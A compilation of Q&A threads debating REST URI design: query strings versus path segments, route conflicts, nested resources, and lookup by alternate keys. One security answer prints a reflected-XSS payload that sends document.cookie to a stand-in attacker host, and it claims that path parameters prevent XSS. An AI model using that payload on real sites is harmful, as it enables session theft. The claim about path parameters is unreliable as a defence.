Is it still REST if we identify resources with URLs which contain query string components? - rest

1) I assume query string component of an URL is also considered as being a part of identity of a resource?
2) If it indeed is considered as being a part of identity, are there any reasons why in REST we can't/shouldn't identify resources with URLs which contain query string components?
Thank you

If the resource you are addressing with a URL represents a collection of resources like http://yourdomain.com/customers it's a valid restful way to filter the result with query-parameters:
http://yourdomain.com/customers?minSalary=2000&maxAge=50
So yes, query-parameters are meaningful for identifying resources.

I think you root question is about using a query that would return a unique item.
/orders?ID=8
which would be the same resource as
/order/8
So there we have two URIs for the same resource. You might be asking is that ok, and it is perfectly fine to have multiple URIs to get the same resource. Generally you should link to a more 'canonical' URI, the shortest 'path' (hierarchally speaking) for a resource.
You shouldn't rely on query parameters generally, as it tends to lead towards awkward API designs. For example, if you want to know all the orders made by bob, you might be tempted to think "well, I'm filtering the orders" and so do
/orders?users=bob
Where as better way of thinking is "I want all users, just bob, just his orders", so you would instead do
/users/bob/orders
This is a simple URI that you would be able to link to from the 'user resource' for bob. Sadly though, this second approach can get a bit awkward when you want to say, look at orders from multiple users
/users/jack,jill,alice,bob/orders
It's workable, but very odd looking.

Related

Conflicting REST urls

So I'm building a REST api and need to make some urls. The problem is, I'm running into some conflicting paths. For example:
GET <type>/<id> gets the details of an object of a given type and id
GET <type>/summary gets the summary of objects of a given type
This simplified example shows a problem occurs when an object has id "summary". What is the best way to solve this? From a REST puritan perspective, what should be the solution?
Here's some of my ideas:
Put the <id> in query parameters. From what I understand this is against standards
Put a keyword at the start of the url. Also against standards?
Disallow certain id values. Not something I want to enforce for all my users and use cases and different entrances into my system
I may have an alternative to this. What if we have both book as wel as the plural books. Then you can have:
/book/{id}
and
/books/summary
or
/books/count
The URL structure is not quite right to begin with so it's difficult to solve it in a clean way.
For the sake of discussion, let's assume <type> is a books resource. So the first URL is fine - you get a book of the given ID:
GET /books/<id>
However this is not:
GET /books/summary
Because it's a bespoke URL, which I guess has a use in your application but is not restful. A GET call should return one or more resources. However a "summary" is not a resource, it's a property of a resource and that's why you end up in this situation of having IDs mixed up with book properties.
So your best option would be to change this URL to something like this:
GET /books?fields=summary
By default GET /books would return all the resources, while GET /books?fields=<list_of_fields> will return the books but with only the chosen properties.
That will be similar to your previous URL but without the ID/property conflict, and will also allow you later on to retrieve resources with specific fields (without having to create new custom URLs).
Edit:
Regarding the count of books, it's still useful to reason in terms of resources. /books gives you one or more books, but it should not be used for meta-information about the collection, such as count, but also things like "most read book", or "books that start with the letter 'A'", etc. as that will make the resource more and more complex and difficult to maintain.
Depending on what you want to achieve I think there'd be two solutions:
Create a new resource that manages the collection of books. For example:
GET /bookcase
And that will give you information about the collection, for example:
{
"count": 1234,
"most_read": "<isbn>",
// etc. - any information that might be needed about the book collection
}
Or a search engine. You create a resources such as:
GET /book_search_engine/?query=
which would return a search result such as:
{
"count": 123,
"books": [
// Books that match the query
]
}
then a query like this would give you just the count:
// Search all the books, but provide only the "count" field
GET /book_search/?query=*&fields=count
Obviously that's a more involved solution and maybe not necessary for a simple REST API, however it can be useful as it makes it easier to create queries specific to a client.
This simplified example shows a problem occurs when an object has id "summary". What is the best way to solve this? From a REST puritan perspective, what should be the solution?
As far as REST is concerned, the URI are opaque. Spelling is absolutely irrelevant. You could use URI like
/a575cc90-2878-41fe-9eec-f420a509e1f0
/f871fff6-4c4e-48f7-83a4-26858fdb3096
and as far as REST is concerned, that's spot on. See Stefan Tilkov's talk REST: I Don't Think It Means What You Think It Does.
What you are asking about is URI design, how to adapt conventions/best practices to your particular setting.
One thing that will help is to recognize is that summary is a resource, in the REST/HTTP sense -- it is a document that can be represented as a byte sequence. All you need to do is figure out where that resource belongs (according to your local spelling conventions).
Continuing to borrow the "books" example used by others
# Here's the familiar "URI that identifies a member of the books collection"
/books/<id>
# Here's the summary of the /books collection
/summaries/books
Put the in query parameters. From what I understand this is against standards
Not as much as you might think. REST doesn't care. The URI spec expresses some views about hierarchical vs non hierarchical data. HTTP supports the notion of a redirect, where one resource can reference another.
GET /books?id=12345
302 Found
Location: /books/12345
You also have options for skipping a round trip, by returning the representation you want immediately, taking advantage of Content-Location
GET /books?summary
200 OK
Content-Location: /summaries/books
...
I have the same issue. And all the solutions seem a little off b/c REST best practices seem to suggest none of them are ideal.
You could have just one off-limit id, like all.
GET <type>/<id>
GET <type>/all/summary
It might even be possible to use a single symbol instead, such as ~ or _.
GET <type>/<id>
GET <type>/~/summary
How satisfying this solution seems is of course very subjective.
The singular/plural approach seems more elegant to me but despite most REST best practice guides saying not to do this. Unfortunately some words don't have distinct singular and plural forms.
This isn't perfectly conventional for how some like to define their rest endpoints.
But I would would enforce a pattern where "id" cannot be any string. Instead I would use a uuid and define my routes as such.
GET /books/{id:uuid}
GET /books/{id:uuid}/summary
And if you really want a verb in the URL without an identifier it is still technically possible because we know the {id:uuid} in the path must conform to the uuid pattern.
With that GET /books/summary is still distinct from GET /books/{id:uuid}

URI of REST to reflect relationship of resources?

I knew some name conversions of REST API, for example resource name should be plural, using different HTTP method with same URI to perform different action on that resource, etc.
But as URI should reflect relationship of resources, I am a little confused. Take SO as a example, when update a existed comment of a answer, URI should looks like:
PUT /{contextPath}/questions/{questionId}/answers/{answerId}/comments/{commentId}
But I feel awkward when using this so-called standard URI because:
It's a little verbose, especially when the hierarchical is very
deep.
questionId and answerId is completely unnecessary here, since
commentId is sufficient for server to identify a comment record.
So what's the appropriate way to deal with this? should I always follow name conversions, or make some changes when the relationship hierarchical of resources is very deep?
I emphatically disagree that "URI should reflect relationship of resources".
URIs are pointers to resources. That's it. There are conventions for making them human-readable, and therefore easier to work with. There is certainly no hard-and-fast rule that relationships should be modeled on the URI path. Feel free to model resources in a flat, rather than hierarchical manner. Use links to model relationships between the resources, and query parameters to narrow down collections.
It gives you more Options without haveing to make extra requests.
Thus allowing you to call functions that might require say a questionId.
When you only have the commentId you have to first query your questionId.
Depending on what your functions require. If you had specific info on the previous page and have to use it again in the next why query it twice? Unless it is sensitive which an questionId clearly is not.
Thats my opinion on how you should look at your addoption of the standard
I would simplify the route/URI to:
PUT /comments/{commentId}
along with at the corresponding RequestBody, perhaps some sort of DTO.
The URI should not have to show the hierarchy all the way from the context path. It can be the shortest URI that can uniquely identify the resource

Rest 'guidelines' make the API design difficult

I am trying to create an API for my Rest services and i am struggling with the design rules that i try to follow. In generally i am trying to follow (among others) these guidelines:
Don't use verbs in the URIs
Don't use query parameters when altering states
Use plural
Don't use camel case
Now, i have to model something like the following:
Get all departments of a company
Get a department of a company
Delete all deprtaments of a company
Delete a department of a company
I am trying something like this:
GET company/departments
GET company/departments/<depName>
DELETE company/departments
DELETE company/departments {body: department name}
The above, follows the guidelines that i have mentioned, but i really don't think that the resulted URIs are good. Especially the fourth, does a different job and has the same URI as the third.
This is a common problem for me, and i encounter it many times when i am designing REST services. The result is that i always break some designing principles to achieve what i want or make uglier URIs (for example: DELETE company/departments/department).
So the actual question is:
In my design, how can i delete a single department with a Restfull-like URI?
A URL consists of several parts:
http://example.com/company/departments/12345?arg1=this&arg2=that
http: is the scheme. //example.com is the host. /company/departments/12345 is the path, ?arg1=this&arg2=that is the query string, consisting of two parameters: arg1 and arg2. There's another aspect, called matrix arguments, which won't be discussed here.
When REST talks about URLs, it refers to the entire thing. Not parts of it. To REST the entire URL is treated as an opaque blob.
That means REST doesn't care about any particular part: the scheme, the host, the path, or the arguments.
ftp://127.0.0.1/E280F814-1524-41D5-8735-43D8414AE242 is a perfectly fine URL as far as REST is concerned.
So as far as REST is concerned, it doesn't give a rip what path you use in your URL or whether you use parameters or not.
That said, the recommendations against parameters in a URL is because sometimes, caches don't cache paramaterized URLs properly. Thus the preference for /company/department/12345 over /company/department?id=12345.
The 12345 in the path is not a parameter. Its the name of the resource. Just like starwars.mp4 above is not a parameter, nor is E280F814-1524-41D5-8735-43D8414AE242. They're just names. The only folks that actually care are people. The computer doesn't care, the internet doesn't care, REST doesn't care. To them, it's just all bits.
So it sounds like a simple miscommunication that you're fighting. Try not to stress over it too much. Too much weight is pressed on URL naming anyway, when it's the resources and their representations that actually matter.
A better design for RESTful URIs is to use an identifier for the resource. In this case the resource is the department.
So your URIs could be like the following:
GET company/departments
GET company/departments/<department-id>
DELETE company/departments
DELETE company/departments/<department-id>
For example...
DELETE company/departments/58491
By using an identifier, rather than the department name, this avoids spaces in your URIs, which is undesirable. By department name, i assume you meant the user friendly display name, such as "Human Capital Management."
I agree. You should use URL like below to delete a department. Such URL identify a department and can be used to execute HTTP operations on it. Don't provide the department id or name within the payload of the request.
DELETE company/departments/58491
The following link could give you some more details about designing a RESTful service: https://templth.wordpress.com/2014/12/15/designing-a-web-api/.
Hope it helps you,
Thierry

RESTful url to GET resource by different fields

Simple question I'm having trouble finding an answer to..
If I have a REST web service, and my design is not using url parameters, how can I specify two different keys to return the same resource by?
Example
I want (and have already implemented)
/Person/{ID}
which returns a person as expected.
Now I also want
/Person/{Name}
which returns a person by name.
Is this the correct RESTful format? Or is it something like:
/Person/Name/{Name}
You should only use one URI to refer to a single resource. Having multiple URIs will only cause confusion. In your example, confusion would arise due to two people having the same name. Which person resource are they referring to then?
That said, you can have multiple URIs refer to a single resource, but for anything other than the "true" URI you should simply redirect the client to the right place using a status code of 301 - Moved Permanently.
Personally, I would never implement a multi-ID scheme or redirection to support it. Pick a single identification scheme and stick with it. The users of your API will thank you.
What you really need to build is a query API, so focus on how you would implement something like a /personFinder resource which could take a name as a parameter and return potentially multiple matching /person/{ID} URIs in the response.
I guess technically you could have both URI's point to the same resource (perhaps with one of them as the canonical resource) but I think you wouldn't want to do this from an implementation perspective. What if there is an overlap between IDs and names?
It sure does seem like a good place to use query parameters, but if you insist on not doing so, perhaps you could do
person/{ID}
and
personByName/{Name}
I generally agree with this answer that for clarity and consistency it'd be best to avoid multiple ids pointing to the same entity.
Sometimes however, such a situation arises naturally. An example I work with is Polish companies, which can be identified by their tax id ('NIP' number) or by their national business registry id ('KRS' number).
In such case, I think one should first add the secondary id as a criterion to the search endpoint. Thus users will be able to "translate" between secondary id and primary id.
However, if users still keep insisting on being able to retrieve an entity directly by the secondary id (as we experienced), one other possibility is to provide a "secret" URL, not described in the documentation, performing such an operation. This can be given to users who made the effort to ask for it, and the potential ambiguity and confusion is then on them, if they decide to use it, not on everyone reading the documentation.
In terms of ambiguity and confusion for the API maintainer, I think this can be kept reasonably minimal with a helper function to immediately detect and translate the secondary id to primary id at the beginning of each relevant API endpoint.
It obviously matters much less than normal what scheme is chosen for the secret URL.

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.